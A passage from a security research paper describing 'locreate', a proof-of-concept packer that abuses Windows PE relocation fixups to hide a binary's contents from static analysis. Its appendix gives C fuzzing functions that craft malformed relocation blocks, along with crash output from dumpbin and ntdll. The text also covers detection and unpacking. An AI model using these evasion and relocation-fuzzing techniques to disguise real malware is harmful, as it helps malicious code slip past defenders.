||||
advance of this writing. Examples that apply this technique include
|
||||
W95/Resurrel and W95/Silcer. Further research indicates that Peter Szor did a
|
||||
write-up on this technique entitled ``Tricky Relocations'' in the April 2001
|
||||
edition of Virus Bulletin[2,3].
|
||||
|
||||
2) Locreate
|
||||
|
||||
Executable packers, such as UPX, are commonly employed by malware as a means
|
||||
of delaying or otherwise thwarting the process of static analysis. Packers
|
||||
also have perfectly legitimate uses, but these uses fall outside of the scope
|
||||
of this paper. The reason packers make static analysis more difficult is
|
||||
because they alter the form of the binary to the point that what appears on
|
||||
disk is entirely different from what actually ends up executing in memory.
|
||||
This alteration is typically accomplished by encapsulating a pre-existing
|
||||
binary in a ``host'' binary. The algorithm used to encapsulate the
|
||||
pre-existing binary in the host binary is what differs from one packer to the
|
||||
next. In most cases, the host binary must contain code that will perform the
|
||||
inverse of the packing operation in order to decapsulate the original binary.
|
||||
The code that is responsible for performing this operation is typically
|
||||
referred to as an unpacker. The process of unpacking the original binary is
|
||||
usually done entirely in memory without writing the original version out to
|
||||
disk. Once the original binary is unpacked, execution control is transferred
|
||||
to the original binary which begins executing as if nothing had changed.
|
||||
|
||||
This general approach represents an easy way of altering the form of a binary
|
||||
without changing its effective behavior. In fact, it's pretty much analagous
|
||||
to payload encoders that are used in conjunction with exploits to alter the
|
||||
form of a payload in order to satisify some character restrictions without
|
||||
changing the payload's effective behavior. In the case of payload encoders,
|
||||
some arbitrary code must be prefixed to the encoded payload in order to
|
||||
perform the inverse of the encoding operation once the payload is executed.
|
||||
However, like payload encoders, the use of custom code to perform the inverse
|
||||
of the packing or encoding operation can lead to a few problems.
|
||||
|
||||
The most apparent of these problems has to do with the fact that while the
|
||||
packed form of an executable may be entirely different from its original, the
|
||||
code used to perform the unpacking operation may be static. In the event that
|
||||
the unpacker consists of static code, either in whole or in part, it may be
|
||||
possible to signature or otherwise identify that a particular packing
|
||||
algorithm has been used to produce a binary and thus make it easier to restore
|
||||
the original form of the binary. This ability is especially important when it
|
||||
comes to attempting to heuristically identify malware prior to allowing a user
|
||||
to execute it.
|
||||
|
||||
The use of custom code can also make it possible for tools to be developed
|
||||
that attempt to identify unpackers based on their behavior. Ero Carrera has
|
||||
provided some excellent illustrations relating to the feasibility of this type
|
||||
of attack against unpackers[1]. An understanding of an unpacker's behavior may
|
||||
also make it possible to acquire the original binary without allowing it to
|
||||
actually execute by simply tracing the unpacker up until the point where it
|
||||
transfers execution control to the original binary. In the case of malware,
|
||||
this weakness means that benefits gained from packing an executable can be
|
||||
completely nullified.
|
||||
|
||||
Both of these problems are meant to illustrate that even though custom unpacking
|
||||
code is often a requirement, its mere presence exposes a potential point of
|
||||
weakness. If it were possible to eliminate the custom code required to unpack
|
||||
a binary, it could make the two problems described previously much more difficult
|
||||
to realize. To that point, the technique described in this paper does not
|
||||
rely on the presence of custom code in a packed binary in order to unpack
|
||||
itself. Instead, documented behavior of the dynamic loader is used to perform
|
||||
the unpacking whenever the packed binary is executed. While this approach has
|
||||
its benefits, there are a number of problems with it that will be discussed
|
||||
later on. In the interest of brevity, the packer described in this paper will
|
||||
simply be referred to as locreate. As was already mentioned,
|
||||
locreate leverages a documented feature of most dynamic loaders in order to
|
||||
perform its unpacking operation. Given that the process of unpacking
|
||||
typically involves transforming the original binary's contents back into its
|
||||
original form, there are only a finite number of dynamic loader features that
|
||||
might be abused. Perhaps the feature that is best suited for transforming the
|
||||
contents of a binary at runtime is the dynamic loader feature that was
|
||||
designed to do just that: relocations.
|
||||
|
||||
In the event that a binary is unable to be loaded at its preferred base
|
||||
address at runtime, the dynamic loader is responsible for attempting to move
|
||||
the binary to another location in memory. The act of moving a binary from its
|
||||
preferred base address to a new base address is more commonly referred to as
|
||||
relocating. When a binary is relocated to a new base address, any references
|
||||
the binary might have to addresses that are relative to its preferred base
|
||||
address will no longer be valid. As such, references that are relative to the
|
||||
preferred base address must be updated by the dynamic loader in order to make
|
||||
them relative to the new base address. Of course, this presupposes that the
|
||||
dynamic loader has some knowledge of where in the binary these address
|
||||
references are made. To satisfy this presupposition, binaries will typically
|
||||
include relocation information to provide the dynamic loader with a map to the
|
||||
locations within the binary that need to be adjusted. When a binary does not
|
||||
include relocation information, it's classified as a non-relocatable binary.
|
||||
Without relocation information, a binary cannot be relocated to an alternate
|
||||
base address in an elegant manner (ignoring position independent executables).
|
||||
|
||||
The structures used to convey relocation information differs from one binary
|
||||
format to the next. For the purpose of this paper, only the structures used
|
||||
to describe relocations of Portable Executable (PE) binaries will be
|
||||
discussed. However, it should be noted that the approaches described in this
|
||||
paper should be equally applicable to other binary formats, such as ELF. In
|
||||
fact, other binary formats make the technique used by locreate even easier.
|
||||
For example, ELF supports applying relocation fixups with an addend. This
|
||||
addend is basically an arbitrary value that is used in conjunction with a
|
||||
transformation. The PE binary format conveys relocation information through
|
||||
one of the data directories that is included within the optional header
|
||||
portion of the NT header. This data directory is symbolically referred to
|
||||
through the use of the IMAGE_DIRECTORY_ENTRY_BASERELOC. The base relocation
|
||||
data directory consists of zero or more IMAGE_BASE_RELOCATION structures which
|
||||
are defined as:
|
||||
|
||||
typedef struct _IMAGE_BASE_RELOCATION {
|
||||
ULONG VirtualAddress;
|
||||
ULONG SizeOfBlock;
|
||||
// USHORT TypeOffset[1];
|
||||
} IMAGE_BASE_RELOCATION, *PIMAGE_BASE_RELOCATION;
|
||||
|
||||
The base relocation data directory is a little bit different from most other
|
||||
data directories. The IMAGE_BASE_RELOCATION structures embedded in the data
|
||||
directory do not occur immediately one after the other. Instead, there are a
|
||||
variable number of USHORT sized fixup descriptors that separate each
|
||||
structure. The SizeOfBlock attribute of each structure describes the entire
|
||||
size of a relocation block. Each relocation block consists of the base
|
||||
relocation structure and the variable number of fixup descriptors. Therefore,
|
||||
enumeration of the base relocation data directory is best performed by using
|
||||
the SizeOfBlock attribute of each structure to proceed to the next relocation
|
||||
block until none are remaining. The VirtualAddress attribute of each
|
||||
relocation block is a page-aligned relative virtual address (RVA) that is used
|
||||
as the base address when processing its associated fixup descriptors. In this
|
||||
manner, each relocation block describes the relocations that should be applied
|
||||
to exactly one page.
|
||||
|
||||
The fixup descriptors contained within a relocation block describe the address
|
||||
of the value that should be transformed and the method that should be used to
|
||||
transform it. The PE format describes about 10 different transformations that
|
||||
can be used to fixup an address reference. These transformations are conveyed
|
||||
through the top 4 bits of each fixup descriptor. The bottom 12 bits are used
|
||||
to describe the offset into the VirtualAddress of the containing relocation
|
||||
block. Adding the bottom 12 bits of a fixup descriptor to the VirtualAddress
|
||||
of a relocation block produces the RVA that contains a value that needs to be
|
||||
transformed. Of the transformation methods that exist, the one most commonly
|
||||
used on x86 is IMAGE_REL_BASED_HIGHLOW, or 3. This transformation dictates that
|
||||
the 32-bit displacement between the original base address and the new base
|
||||
address should be added to the value that exists at the RVA described by the
|
||||
fixup descriptor. The act of adding the displacement means that the value
|
||||
will be transformed to make it relative to the new base address rather than
|
||||
the original base address. To better understand how all of these things tie
|
||||
together, consider the following source code example:
|
||||
|
||||
#include <stdlib.h>
|
||||
#include <stdio.h>
|
||||
|
||||
int main(int argc, char **argv)
|
||||
{
|
||||
printf("Hello World.\n");
|
||||
|
||||
return 0;
|
||||
}
|
||||
|
||||
When compiled down, this function appears as the following:
|
||||
|
||||
sample!main:
|
||||
00401010 55 push ebp
|
||||
00401011 8bec mov ebp,esp
|
||||
00401013 6800104200 push offset sample!__rtc_tzz <PERF> (sample+0x21000) (00421000)
|
||||
00401018 e80c000000 call sample!printf (00401029)
|
||||
0040101d 83c404 add esp,4
|
||||
00401020 33c0 xor eax,eax
|
||||
00401022 5d pop ebp
|
||||
00401023 c3 ret
|
||||
|
||||
At address 0x00401013, main pushes the address of the string that contains
|
||||
``Hello World!'':
|
||||
|
||||
0:000> db 00421000 L 10
|
||||
00421000 48 65 6c 6c 6f 20 57 6f-72 6c 64 2e 0a 00 00 00 Hello World.....
|
||||
|
||||
In this case, the push instruction is referring to the string using an
|
||||
absolute address. If the sample executable must be relocated at runtime, the
|
||||
dynamic loader must be provided with the relocation information necessary to
|
||||
fixup the reference to the absolute address. The dumpbin.exe utility from
|
||||
Visual Studio can be used to confirm that this information exists. The first
|
||||
requirement is that the binary must have relocation information. By default,
|
||||
all DLLs will contain relocation information, but executables typically do
|
||||
not. Executables can be compiled with relocation information by using the
|
||||
/fixed:no linker flag. When a binary is compiled with relocations, the
|
||||
presence of relocation information is simply indicated by a non-zero
|
||||
VirtualAddress and Size for the base relocation data directory. These values
|
||||
can be determined through dumpbin.exe /headers:
|
||||
|
||||
26000 [ EE8] RVA [size] of Base Relocation Directory
|
||||
|
||||
Since relocation information must be present at runtime, there should also be
|
||||
a section, typically named .reloc, that contains the virtual mapping
|
||||
information for the relocation information:
|
||||
|
||||
SECTION HEADER #5
|
||||
.reloc name
|
||||
1165 virtual size
|
||||
26000 virtual address (00426000 to 00427164)
|
||||
2000 size of raw data
|
||||
24000 file pointer to raw data (00024000 to 00025FFF)
|
||||
0 file pointer to relocation table
|
||||
0 file pointer to line numbers
|
||||
0 number of relocations
|
||||
0 number of line numbers
|
||||
42000040 flags
|
||||
Initialized Data
|
||||
Discardable
|
||||
Read Only
|
||||
|
||||
In order to validate that this executable contains relocation information for
|
||||
the absolute address reference made to the ``Hello World!'' string, the
|
||||
dumpbin.exe /relocations command can be used:
|
||||
|
||||
File Type: EXECUTABLE IMAGE
|
||||
|
||||
BASE RELOCATIONS #5
|
||||
1000 RVA, A8 SizeOfBlock
|
||||
14 HIGHLOW 00421000
|
||||
2C HIGHLOW 00420350
|
||||
...
|
||||
|
||||
This output shows the first relocation block which describes the RVA 0x1000.
|
||||
Each line below the relocation block header describes the individual fixup
|
||||
descriptors. The information displayed includes the offset into the page, the
|
||||
type of transformation being performed, and the current value at that location
|
||||
in the binary. From the disassembly above, the location of the address
|
||||
reference that is being made is 0x00401014. Therefore, the very first fixup
|
||||
in this relocation block provides the dynamic loader within the information
|
||||
necessary to change the address reference to the new base address when the
|
||||
binary is relocated. If this binary were to be relocated to 0x50000000, the
|
||||
HIGHLOW transformation would be applied to 0x00401014 as follows. The
|
||||
displacement between the new base address and the old address would be
|
||||
calculated as 0x50000000 - 0x00400000, or 0x4fc00000. Adding 0x4fc00000 to
|
||||
the existing value of 0x00421000 produces 0x50021000 which is subsequently
|
||||
stored in 0x00401014. This causes the absolute address reference to become
|
||||
relative to the new base address.
|
||||
|
||||
Based on this basic understanding of how relocations are processed, it's now
|
||||
possible to describe how a packer can be implemented that takes advantage of
|
||||
the way the dynamic loader processes relocation information. As has been
|
||||
illustrated above, relocation information is designed to make it possible to
|
||||
fixup absolute address references at runtime when a binary is relocated.
|
||||
These fixups are applied by taking into account the displacement between the
|
||||
new base address and the original base address. More often than not, this
|
||||
displacement isn't known ahead of time, thus making it impossible to reliably
|
||||
predict how the content at a specific location in the binary will be altered.
|
||||
But what if it were possible to deterministically know the displacement in
|
||||
advance? Knowing the displacement in advance would make it possible to alter
|
||||
various locations of the binary in a manner that would permit the original
|
||||
values to be restored by relocations at runtime. In effect, the on-disk
|
||||
version of the binary could be made to appear quite different from the
|
||||
in-memory version at runtime. This is the basic concept behind locreate.
|
||||
|
||||
In order for locreate to work it must be possible to predict the displacement
|
||||
reliably. Since the displacement is calculated in relation to the preferred
|
||||
base address and the expected base address, both values must be known.
|
||||
Furthermore, the binary must be relocated every time it executes in order for
|
||||
the relocations to be applied. As it happens, both of these problems can be
|
||||
solved at once. Since a binary is only guaranteed to be relocated if its
|
||||
preferred base address is in conflict with an existing address, a preferred
|
||||
base address must be selected that will always lead to a conflict. This can
|
||||
be accomplished by setting the preferred base address to any invalid user-mode
|
||||
address (any address above 0x80000000 inclusive). This assumes that the machine
|
||||
that the executable will run on is not running with /3GB. If so, a higher
|
||||
address would have to be used.. Alternatively, the base address can be set to
|
||||
SharedUserData which is guaranteed to be located at 0x7ffe0000 in every
|
||||
process. Setting the binary's preferred base address to any of these
|
||||
addresses will force it to be relocated every time it executes. The only
|
||||
unknown is what address the binary is expected to be relocated to.
|
||||
|
||||
Determining the address that will be relocated to depends on the state of the
|
||||
process' address space at the time that the binary is relocated. If the
|
||||
binary that's being relocated is an executable, then the process' address
|
||||
space is generally in a pristine state since the executable is one of the
|
||||
first things to be mapped into the address space. As such, the first
|
||||
available address will always be 0x10000 on default installations of Windows.
|
||||
If the binary is a DLL, it's hard to predict what the state of the address
|
||||
space will be in all cases. When a conflict does occur, the kernel searches
|
||||
for an available address region by traversing from lowest to highest address.
|
||||
For the purposes of this paper, it will be assumed that an executable is being
|
||||
packed and that the address being relocated to is 0x10000. Further research
|
||||
may provide insight into how to better control or alter the expected base
|
||||
address.
|
||||
|
||||
With both the preferred base address and the expected base address known, the
|
||||
only thing that remains is to perform the operations that will transform the
|
||||
on-disk version of the binary in a manner that causes custom relocations to
|
||||
restore the binary to its original form at runtime. This process can be both
|
||||
simplistic and complicated. The simplest approach would be to enumerate over
|
||||
the contents of each section in the binary, altering the value at each
|
||||
location by subtracting the displacement and then creating a relocation fixup
|
||||
descriptor that will ensure that the contents are restored to the expected
|
||||
value at runtime. This is how the proof of concept works. A more complicated
|
||||
approach would be to create multiple relocation fixup descriptors per-address.
|
||||
This would mean that the displacement would need to be subtracted once for
|
||||
each fixup descriptor. It should also be possible to apply relocations to
|
||||
individual bytes within a four byte span rather than applying relocations in
|
||||
four byte increments. Even more interesting would be to use some fixup types
|
||||
other than HIGHLOW, although this could be seen as something that might make
|
||||
generating a signature easier.
|
||||
|
||||
The end result of this whole process is a functional proof of concept that
|
||||
packs a binary in the manner described above. To get a feel for how different
|
||||
the binary looks after being packed, consider what the implementation of main
|
||||
from earlier in this paper looks like. Notice how the first two instructions
|
||||
are the same as they were previously. This has to do with the fact that base
|
||||
addresses must align on 64KB boundaries, and thus the lower two bottoms are
|
||||
not changed. This could be further improved such as through the strategies
|
||||
described above:
|
||||
|
||||
.text:84011000 loc_84011000:
|
||||
.text:84011000 push ebp
|
||||
.text:84011001 mov ebp, esp
|
||||
.text:84011003 in al, dx
|
||||
.text:84011004 add [eax+0], dh
|
||||
.text:84011006 add [edi+edi*8+1209C15h], eax
|
||||
.text:8401100D test [ebx-3FCCFB3Ch], al
|
||||
.text:84011013 loope near ptr 84010FD8h
|
||||
.text:84011015
|
||||
.text:84011015 loc_84011015:
|
||||
.text:84011015 push (offset off_8401139C+1)
|
||||
|
||||
The locreate proof of concept has been tested on Windows XP and Windows 2003
|
||||
Server. Initial testing on Windows Vista indicates that Vista does not
|
||||
properly alter the entry point address after relocations have been applied
|
||||
when an executable is packed. Even though the proof of concept implementation
|
||||
works, there are a number of more fundamental problems with the technique
|
||||
itself.
|
||||
|
||||
The first set of problems has to do with techniques that can be used to
|
||||
signature locreate packed executables. Since locreate relies on injecting a
|
||||
large number of relocation fixups, it may be possible to heuristically detect
|
||||
an increased number of relocation fixups with relation to the size of
|
||||
individual segments. This particular attack could be solved by decreasing the
|
||||
number of relocation fixups injected by locreate. This would have the effect
|
||||
of only partially mangling the binary, but it might be enough to make people
|
||||
wonder what's going on without giving things away. Even if it weren't
|
||||
possible to heuristically detect an increased number of relocation fixups,
|
||||
it's definitely possible to detect the fact that an executable packed by
|
||||
locreate will have an invalid preferred base address that will always result
|
||||
in a conflict. This fact alone makes it mostly trivial to at least detect
|
||||
that something odd is going on.
|
||||
|
||||
Detection is only the first problem, however. Once a locreate packed
|
||||
executable has been detected, the next logical step is to attempt to figure
|
||||
out some way of obtaining the original executable. Since locreate relies on
|
||||
relocation fixups to do this, the only thing one would have to do in order to
|
||||
obtain the original binary would be to relocate the executable to the expected
|
||||
base address that was used when the binary was packed, such as 0x10000. While
|
||||
it's trivial to develop tools to perform this action, the Interactive
|
||||
Disassembler (IDA) already supports it. When opening an executable, the
|
||||
``Manual Load'' checkbox can be toggled. This will cause IDA to prompt the
|
||||
user to enter the base address that the binary should be loaded at. When the
|
||||
base address is entered, IDA processes relocations and presents the relocated
|
||||
binary image. The mitigating factor here is that the user must know the
|
||||
expected base address, otherwise the binary will still appear completely
|
||||
mangled when it's relocated to the wrong base address.
|
||||
|
||||
In the author's opinion, these problems make locreate a sub-par packer. At
|
||||
best it should be viewed as an interesting approach to the problem of packing
|
||||
executables, but it should not be relied upon as a means of thwarting static
|
||||
analysis. Anyone who reads this paper will have the tools necessary to unpack
|
||||
executables that have been packed by locreate. With that said, it should be
|
||||
noted that there is still an opportunity for further research that could help
|
||||
to identify ways of improving locreate. For instance, a better understanding
|
||||
of differences in the way the dynamic loader and existing static analysis
|
||||
tools process relocation fixups could provide some opportunity for
|
||||
improvement. Results from some of the author's initial tests of these ideas
|
||||
are included in appendix A. Here's a brief list of some differences that could
|
||||
exist:
|
||||
|
||||
1. Different behaviors when processing fixups
|
||||
|
||||
It's possible that the dynamic loader and static analysis tools such as IDA
|
||||
may not support the same set of fixup types. Furthermore, they may not
|
||||
process fixup types in the same way. If differences do exist, it may be
|
||||
possible to create a packed executable that will work correctly when used
|
||||
against the dynamic loader but not render properly when relocated using a
|
||||
static analysis tool such as IDA.
|
||||
|
||||
2. Relocation blocks with non-page-aligned VirtualAddress fields
|
||||
|
||||
It's unknown whether or not the dynamic loader and static analysis tools are
|
||||
able to properly handle relocation blocks that have non-page-aligned
|
||||
VirtualAddress's. In all normal circumstances, VirtualAddress will be
|
||||
page aligned.
|
||||
|
||||
3. Relocation blocks that modify other relocation blocks
|
||||
|
||||
An interesting situation that may lead to differences between the dynamic
|
||||
loader and static analysis tools has to do with relocation blocks that modify
|
||||
other relocation blocks. In this way, the relocation information that exists
|
||||
on disk is not what is actually used, in its entirety, when relocating an
|
||||
image during runtime.
|
||||
|
||||
Even if research into these topics doesn't yield any direct improvements to
|
||||
locreate, it should nonetheless provide some interesting insight into the way
|
||||
that different applications handle relocation processing. And after all,
|
||||
gaining knowledge is what it's really all about.
|
||||
|
||||
Appendix A) Differences in Relocation Processing
|
||||
|
||||
This appendix attempts to describe some tests that were run on different
|
||||
applications that process relocation entries for binary files. Identifying
|
||||
differences may make it possible to have a binary that will work correctly
|
||||
when executed but not when analyzed by a static analysis tool such as IDA. To
|
||||
test out these ideas, the author threw together a small relocation fuzzing
|
||||
tool that is aptly named relocfuzz. This tool will take a pre-existing binary
|
||||
and create a new one with custom relocations. The code for this tool can be
|
||||
found in the other code associated with this paper.
|
||||
|
||||
The tests included in this appendix were performed against three different
|
||||
applications: the dynamic loader (ntdll.dll), IDA, and dumpbin. If the same
|
||||
tests are run against other applications, the author would be interested in
|
||||
knowing the results.
|
||||
|
||||
A.1) Non-page-aligned Block VirtualAddress
|
||||
|
||||
In all normal cases, relocation blocks will be created with a page-aligned
|
||||
VirtualAddress. However, it's unclear if non-page-aligned VirtualAddress
|
||||
fields will be handled correctly when relocations are processed. There are
|
||||
some interesting implications of non-page-aligned VirtualAddress's. In many
|
||||
applications, such as the dynamic loader, it's critical that addresses
|
||||
referenced through RVAs are validated so as to prevent references being made
|
||||
to external addresses. For example, if relocations were processed in
|
||||
kernel-mode, it would be critical that checks be performed to ensure that RVAs
|
||||
don't end up making it possible to reference kernel-mode addresses. The
|
||||
reason why non-page-aligned VirtualAddress's are interesting is because they
|
||||
leave open the possibility of this type of attack.
|
||||
|
||||
Consider the scenario of a binary that is relocated to 0x7ffe0000, ignoring
|
||||
for the moment that SharedUserData already exists at this location. Now,
|
||||
consider that this binary has a relocation block with a virtual address of
|
||||
0x1ffff. This address is not page-aligned. Now, consider that this
|
||||
relocation block has a fixup descriptor that indicates that at offset 0x4 into
|
||||
this page, a certain type of fixup should be performed. This would equate to
|
||||
modifying memory at 0x80000003, a kernel-mode address. If relocations were
|
||||
being processed in kernel-mode, like they are on Windows Vista for ASLR, then
|
||||
a failure to check that the actual address being written to would result in a
|
||||
dangerous condition.
|
||||
|
||||
Here's an example of some code that attempts to test out this idea:
|
||||
|
||||
static VOID TestNonPageAlignedBlocks(
|
||||
__in PPE_IMAGE Image,
|
||||
__in PRELOC_FUZZ_CONTEXT FuzzContext)
|
||||
{
|
||||
PRELOCATION_BLOCK_CONTEXT KillerBlock = AllocateRelocationBlockContext(1);
|
||||
|
||||
PrependRelocationBlockContext(
|
||||
FuzzContext,
|
||||
KillerBlock);
|
||||
|
||||
KillerBlock->Rva = 0x10001;
|
||||
KillerBlock->Fixups[0] = (3 << 12) | 0;
|
||||
}
|
||||
|
||||
In this example, a custom relocation block is created with one fixup
|
||||
descriptor. The VirtualAddress associated with the block is set to 0x10001
|
||||
and the first fixup descriptor is set to modify offset 0 into that RVA. If
|
||||
the binary that is hosting these relocations is relocated to 0x10000, a write
|
||||
should occur to 0x20001 when processing the relocations. Here are the results
|
||||
from a few initial tests:
|
||||
|
||||
ntdll.dll: The relocation fixup is processed and results in a write
|
||||
to 0x20001.
|
||||
|
||||
IDA: Ignores the relocation fixup, but only because it writes outside of the
|
||||
executable from what it would appear.
|
||||
|
||||
dumpbin.exe: Parses the relocation block without issue.
|
||||
|
||||
A.2) Writing to External Addresses
|
||||
|
||||
Due to the fact that the VirtualAddress associated with each relocation block
|
||||
is a 32-bit RVA, it is possible to create relocation blocks that have RVAs
|
||||
that actually reside outside of the mapped executable that is being relocated.
|
||||
This is important because if steps aren't taken to detect this scenario, the
|
||||
application processing the relocation fixups might be tricked into writing to
|
||||
memory that is external to the mapped binary. Creating a test-case for this
|
||||
example is trivial:
|
||||
|
||||
static VOID CreateExternalWriteRelocationBlock(
|
||||
__in PPE_IMAGE Image,
|
||||
__in PRELOC_FUZZ_CONTEXT FuzzContext)
|
||||
{
|
||||
PRELOCATION_BLOCK_CONTEXT ExtBlock = AllocateRelocationBlockContext(2);
|
||||
|
||||
ExtBlock->Rva = 0x10000;
|
||||
ExtBlock->Fixups[0] = (3 << 12) | 0x0;
|
||||
ExtBlock->Fixups[1] = (3 << 12) | 0x1;
|
||||
|
||||
PrependRelocationBlockContext(
|
||||
FuzzContext,
|
||||
ExtBlock);
|
||||
}
|
||||
|
||||
In this test, a relocation block is created that has a VirtualAddress of
|
||||
0x10000. When the binary is relocated to 0x10000, the actual address of the
|
||||
region that will be written to is 0x20000. In almost all versions of Windows
|
||||
NT, this address is the location of the process parameters structure. The
|
||||
block itself contains two fixup descriptors, each of which will result in a
|
||||
write to the first few bytes of the process parameters structure. The results
|
||||
after running this test are:
|
||||
|
||||
ntdll.dll: The relocation fixup is processed and results in two 32-bit writes
|
||||
to 0x20000 and 0x20001.
|
||||
|
||||
IDA: Ignores RVAs outside of the executable.
|
||||
|
||||
dumpbin.exe: N/A, dumpbin doesn't actually perform relocation fixups.
|
||||
|
||||
A.3) Self-updating Relocation Blocks
|
||||
|
||||
One of the more interesting nuisances about the way relocation fixups are
|
||||
processed is that it's actually possible to create a relocation block that
|
||||
will perform fixups against other relocation blocks. This has the effect of
|
||||
making it such that the relocation information that appears on disk is
|
||||
actually different than what is processed when relocation fixups are applied.
|
||||
The basic idea behind this approach is to prepend certain relocation blocks
|
||||
that apply fixups to subsequent relocation blocks. This all works because
|
||||
relocation blocks are typically processed in the order that they appear. An
|
||||
example of this basic concept is described shown below:
|
||||
|
||||
static VOID PrependSelfUpdatingRelocations(
|
||||
__in PPE_IMAGE Image,
|
||||
__in PRELOC_FUZZ_CONTEXT FuzzContext)
|
||||
{
|
||||
PRELOCATION_BLOCK_CONTEXT SelfBlock;
|
||||
PRELOCATION_BLOCK_CONTEXT RealBlock;
|
||||
ULONG RelocBaseRva;
|
||||
ULONG NumberOfBlocks = FuzzContext->NumberOfBlocks;
|
||||
ULONG Count;
|
||||
|
||||
//
|
||||
// Grab the base address that relocations will be loaded at
|
||||
//
|
||||
RelocBaseRva = FuzzContext->BaseRelocationSection->VirtualAddress;
|
||||
|
||||
//
|
||||
// Grab the first block before we start prepending
|
||||
//
|
||||
RealBlock = FuzzContext->NewRelocationBlocks;
|
||||
|
||||
//
|
||||
// Prepend self-updating relocation blocks for each block that exists
|
||||
//
|
||||
for (Count = 0; Count < NumberOfBlocks; Count++)
|
||||
{
|
||||
PRELOCATION_BLOCK_CONTEXT RelocationBlock;
|
||||
|
||||
RelocationBlock = AllocateRelocationBlockContext(2);
|
||||
|
||||
PrependRelocationBlockContext(
|
||||
FuzzContext,
|
||||
RelocationBlock);
|
||||
}
|
||||
|
||||
//
|
||||
// Walk through each self updating block, fixing up the real blocks to
|
||||
// account for the amount of displacement that will be added to their Rva
|
||||
// attributes.
|
||||
//
|
||||
for (SelfBlock = FuzzContext->NewRelocationBlocks, Count = 0;
|
||||
Count < NumberOfBlocks;
|
||||
Count++, SelfBlock = SelfBlock->Next, RealBlock = RealBlock->Next)
|
||||
{
|
||||
SelfBlock->Rva = RelocBaseRva + RealBlock->RelocOffset;
|
||||
|
||||
//
|
||||
// We'll relocate the two least significant bytes of the real block's RVA
|
||||
// and SizeOfBlock.
|
||||
//
|
||||
SelfBlock->Fixups[0] = (USHORT)((IMAGE_REL_BASED_HIGHLOW << 12) |
|
||||
(((RealBlock->RelocOffset - 2) & 0xfff)));
|
||||
SelfBlock->Fixups[1] = (USHORT)((IMAGE_REL_BASED_HIGHLOW << 12) |
|
||||
(((RealBlock->RelocOffset + 2) & 0xfff)));
|
||||
SelfBlock->Rva &= ~(PAGE_SIZE-1);
|
||||
|
||||
//
|
||||
// Account for the amount that will be added by the dynamic loader after
|
||||
// the first self-updating relocation blocks are processed.
|
||||
//
|
||||
*(PUSHORT)(&RealBlock->Rva) -= (USHORT)(FuzzContext->Displacement >> 16) + 2;
|
||||
*(PUSHORT)(&RealBlock->SizeOfBlock) -= (USHORT)(FuzzContext->Displacement >> 16) + 2;
|
||||
}
|
||||
}
|
||||
|
||||
This test works by prepending a self-updating relocation block for each
|
||||
relocation block that exists in the binary. In this way, if there were two
|
||||
relocations blocks that already existed, two self-updating relocation blocks
|
||||
would be prepended, one for each of the two existing relocation blocks.
|
||||
Following that, the self-updating relocation blocks are populated. Each
|
||||
self-updating relocation block is created with two fixup descriptors. These
|
||||
fixup descriptors are used to apply fixups to the VirtualAddress and
|
||||
SizeOfBlock attributes of its corresponding existing relocation block. Since
|
||||
a HIGHLOW fixup only applies to two most significant bytes, the RVAs of the
|
||||
corresponding fields are adjusted down by two. The end result of this
|
||||
operation is that the first n relocation blocks are responsible for fixing up
|
||||
the VirtualAddress and SizeOfBlock attributes associated with subsequent
|
||||
relocation blocks. When relocations are processed in a linear fashion, the
|
||||
subsequent relocation blocks are updated in a way that allows them to be
|
||||
processed correctly.
|
||||
|
||||
Running this test against the set of test applications produces the following
|
||||
results:
|
||||
|
||||
ntdll.dll: The relocation blocks are fixed up accordingly and the application
|
||||
executes as expected.
|
||||
|
||||
IDA: Initial testing indicates that IDA is capable of handling self-updating
|
||||
relocation blocks.
|
||||
|
||||
dumpbin.exe: Crashes as the result of apparently corrupt relocation blocks:
|
||||
|
||||
DUMPBIN : fatal error LNK1000:
|
||||
Internal error during
|
||||
DumpBaseRelocations
|
||||
|
||||
Version 8.00.50727.42
|
||||
|
||||
ExceptionCode = C0000005
|
||||
ExceptionFlags = 00000000
|
||||
ExceptionAddress = 00443334
|
||||
NumberParameters = 00000002
|
||||
ExceptionInformation[ 0] = 00000000
|
||||
ExceptionInformation[ 1] = 7FFA2000
|
||||
|
||||
CONTEXT:
|
||||
Eax = 0000000A Esp = 0012E500
|
||||
Ebx = 00004F00 Ebp = 00000000
|
||||
Ecx = 7FFA2000 Esi = 00000000
|
||||
Edx = 781C3B68 Edi = 7FFA2000
|
||||
Eip = 00443334 EFlags = 00010293
|
||||
SegCs = 0000001B SegDs = 00000023
|
||||
SegSs = 00000023 SegEs = 00000023
|
||||
SegFs = 0000003B SegGs = 00000000
|
||||
Dr0 = 00000000 Dr3 = 00000000
|
||||
Dr1 = 00000000 Dr6 = 00000000
|
||||
Dr2 = 00000000 Dr7 = 00000000
|
||||
|
||||
A.4) Integer Overflows in Size Calculations
|
||||
|
||||
A potential source of mistakes that could be made when processing relocations
|
||||
has to do with the handling of the SizeOfBlock attribute of a relocation
|
||||
block. There is a potential for an integer overflow to occur in applications
|
||||
that don't properly handle situations where the SizeOfBlock attribute is less
|
||||
than the size of the base relocation structure (which is 8 bytes). In order
|
||||
to calculate the total number of fixups in a section, it's common to see a
|
||||
calculation like (Block->SizeOfBlock - 8) / 2. However, if a check isn't made
|
||||
to ensure that SizeOfBlock is at least 8, an integer overflow will occur. If
|
||||
this happens, the application processing relocations would be tricked into
|
||||
processing a very large number of relocations. An example of a test for this
|
||||
issue is shown below:
|
||||
|
||||
static VOID TestIntegerOverflow(
|
||||
__in PPE_IMAGE Image,
|
||||
__in PRELOC_FUZZ_CONTEXT FuzzContext)
|
||||
{
|
||||
PRELOCATION_BLOCK_CONTEXT EvilBlock = AllocateRelocationBlockContext(0);
|
||||
|
||||
EvilBlock->SizeOfBlock = 0;
|
||||
EvilBlock->Rva = 0x1000;
|
||||
|
||||
PrependRelocationBlockContext(
|
||||
FuzzContext,
|
||||
EvilBlock);
|
||||
}
|
||||
|
||||
In this example, a relocation block is created that has its SizeOfBlock
|
||||
attribute set to zero. This is invalid because the minimum size of a block is
|
||||
8 bytes. The results of this test against different applications are shown
|
||||
below:
|
||||
|
||||
ntdll.dll: Does not perform appropriate checks which appears to result in an
|
||||
integer overflow:
|
||||
|
||||
(9d4.6dc): Access violation - code c0000005 (first chance)
|
||||
First chance exceptions are reported before any exception handling.
|
||||
This exception may be expected and handled.
|
||||
eax=00000000 ebx=00014008 ecx=00011000 edx=80010000 esi=00015000 edi=ffffffff
|
||||
eip=7c91e163 esp=0013fa98 ebp=0013faac iopl=0 nv up ei pl nz na pe nc
|
||||
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010206
|
||||
